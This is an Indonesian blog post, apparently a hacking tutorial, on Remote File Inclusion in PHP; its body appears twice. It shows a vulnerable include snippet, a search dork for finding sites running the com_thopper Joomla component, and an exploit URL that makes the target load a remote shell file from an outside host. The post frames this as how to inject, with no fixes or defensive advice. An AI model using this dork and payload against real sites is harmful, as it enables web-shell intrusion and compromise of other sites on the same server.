Apa itu RFI ( Remote File Include ) :
RFI adalah adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server .. !!!
Kenapa bisa terjadi RFI :
Dalam bahasa pemrograman PHP terdapat bugs PHP yang salah satunya adalah RFI .. !!!
Contoh kesalahan coding PHP berikut ini :
Quote:if(!$_GET['p']
$p=”main”;
$p=$_GET['p'];
dari codingan diatas kenapa bisa terjadi bugs RFI karena adanya pemanggilan procedure secara global. dalam metode Hacking RFI ini, dapat membahayakan domain2 lainnya yang berada dalam 1 server… !!!!
Kenapa bisa terjadi ??
Karena tidak adanya configurasi pembatas (chmod) antara website yang satu dengan yang lainnya, jadi intinya apabila server tidak di konfigurasi secara aman, maka dapat memungkinkan penyusup untuk lopat dari website yang dapat diinjeksi melalui metode RFI kedalam website lainnya yang berada dalam satu server … !!!
Berikut contoh injek dengan RFI .. !!!
Seumpama kita menggunakan dork :
Code:
inurl:index.php?option=”com_thopper”
Code:
http://www.example.com/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://myweb.com/shell.txt
RFI adalah adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server .. !!!
Kenapa bisa terjadi RFI :
Dalam bahasa pemrograman PHP terdapat bugs PHP yang salah satunya adalah RFI .. !!!
Contoh kesalahan coding PHP berikut ini :
Quote:if(!$_GET['p']
$p=”main”;
$p=$_GET['p'];
dari codingan diatas kenapa bisa terjadi bugs RFI karena adanya pemanggilan procedure secara global. dalam metode Hacking RFI ini, dapat membahayakan domain2 lainnya yang berada dalam 1 server… !!!!
Kenapa bisa terjadi ??
Karena tidak adanya configurasi pembatas (chmod) antara website yang satu dengan yang lainnya, jadi intinya apabila server tidak di konfigurasi secara aman, maka dapat memungkinkan penyusup untuk lopat dari website yang dapat diinjeksi melalui metode RFI kedalam website lainnya yang berada dalam satu server … !!!
Berikut contoh injek dengan RFI .. !!!
Seumpama kita menggunakan dork :
Code:
inurl:index.php?option=”com_thopper”
Code:
http://www.example.com/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://myweb.com/shell.txt
Gratisan Musik
0 komentar:
Posting Komentar
Kalau Comment Jangan Junk Ya